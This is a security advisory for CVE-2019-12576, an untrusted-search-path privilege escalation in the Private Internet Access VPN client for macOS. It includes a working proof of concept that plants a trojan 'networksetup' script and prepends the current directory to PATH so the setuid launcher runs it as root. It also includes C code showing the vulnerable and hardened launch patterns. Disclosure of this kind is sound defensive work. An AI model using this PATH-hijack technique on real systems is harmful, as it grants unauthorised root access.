ASA-2019-00382 – London Trust Media Private Internet Access: Untrusted Search Path


Allele Security Alert

ASA-2019-00382

Identifier(s)

ASA-2019-00382, CVE-2019-12576

Title

Untrusted Search Path

Vendor(s)

London Trust Media

Product(s)

Private Internet Access (PIA) VPN Client

Affected version(s)

Private Internet Access (PIA) VPN Client for macOS v82

Fixed version(s)

Private Internet Access (PIA) VPN Client for macOS v1.2.1+

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for macOS could allow an authenticated, local attacker to run arbitrary code with elevated privileges.

Technical details

The PIA macOS openvpn_launcher binary is setuid root. This program is called during the connection process and executes several operating system utilities to configure the system. The networksetup utility is invoked by its bare command name (a relative path) rather than an absolute path. A local unprivileged user can therefore execute arbitrary commands as root by placing a trojan named networksetup earlier in the search path; it will be executed during the connection process. This is possible because the PATH environment variable inherited from the unprivileged caller is not reset before the setuid program executes the OS utility.
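The defect described above, shown as an added example written for this alert (it is not PIA's openvpn_launcher source, which is not public): a bare-name exec that inherits the caller's environment, next to a hardened launcher that maps an allowlist of utilities to absolute paths and hands a fixed environment to execve. The function and table names are hypothetical, and /usr/sbin/networksetup and /sbin/route are assumed macOS default locations.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
/* Allowlist of utilities the launcher may run, mapped to absolute paths.
 * The paths are assumed macOS defaults; the names here are hypothetical. */
static const struct { const char *name; const char *path; } kUtilities[] = {
    { "networksetup", "/usr/sbin/networksetup" },
    { "route",        "/sbin/route" },
};

/* Map a utility name to its absolute path; NULL if it is not allowlisted. */
const char *resolve_utility(const char *name) {
    for (size_t i = 0; i < sizeof kUtilities / sizeof kUtilities[0]; i++)
        if (strcmp(name, kUtilities[i].name) == 0) return kUtilities[i].path;
    return NULL;
}

/* Fixed environment for the child: the caller's PATH (and everything else)
 * is dropped rather than filtered, so a prepended directory has no effect. */
static char *const kSafeEnv[] = { "PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL };

/* VULNERABLE pattern from the advisory: bare name + inherited environment.
 * execvp walks the caller-controlled PATH, so a setuid root process runs
 * whichever "networksetup" appears first. Shown for contrast only. */
int run_utility_unsafe(char *const argv[]) {
    pid_t pid = fork(); if (pid < 0) return -1;
    if (pid == 0) { execvp(argv[0], argv); _exit(127); }
    int st = 0; waitpid(pid, &st, 0);
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* HARDENED: allowlisted absolute path + fixed environment via execve.
 * Returns -2 for a non-allowlisted name: refuse, never fall back to PATH. */
int run_utility_safe(const char *name, char *const argv[]) {
    const char *path = resolve_utility(name);
    if (path == NULL) return -2;
    pid_t pid = fork(); if (pid < 0) return -1;
    if (pid == 0) { execve(path, argv, kSafeEnv); _exit(127); }
    int st = 0; waitpid(pid, &st, 0);
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

int main(void) {
    char *const argv[] = { "networksetup", "-listallnetworkservices", NULL };
    printf("exit status: %d\n", run_utility_safe("networksetup", argv));
    return 0;
}
```

Reviewing a setuid binary for this bug means looking for execvp/execlp/system/popen calls with bare command names and for any exec that passes the inherited environment through; the hardened form removes both at once.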

All steps are executed as a low privileged user.

Step 1 – Create a script named networksetup with the following two lines. This PoC sends the output of the id command to wall, which shows that it is running with root privileges (uid=0).

#!/bin/sh
echo "$0: $(/usr/bin/id)"|/usr/bin/wall

Step 2 – Make the networksetup script executable.

chmod 755 networksetup

Step 3 – Execute run.sh to open the PIA GUI client while prepending the current working directory ($PWD) to the PATH environment variable. This ensures that the trojan networksetup script is found first, because the launcher uses a relative path.

env "PATH=$PWD:$PATH" /Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh

Step 4 – Log in and connect to the VPN.

During the connection process, networksetup will be executed as root and a wall message will be broadcast showing the output of the id command with uid=0.

Credits

Rich Mirch

Reference(s)

PIA macOS Privilege Escalation: Untrusted Search Path
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12576.txt

CVE-2019-12576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12576

CVE-2019-12576
https://nvd.nist.gov/vuln/detail/CVE-2019-12576

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.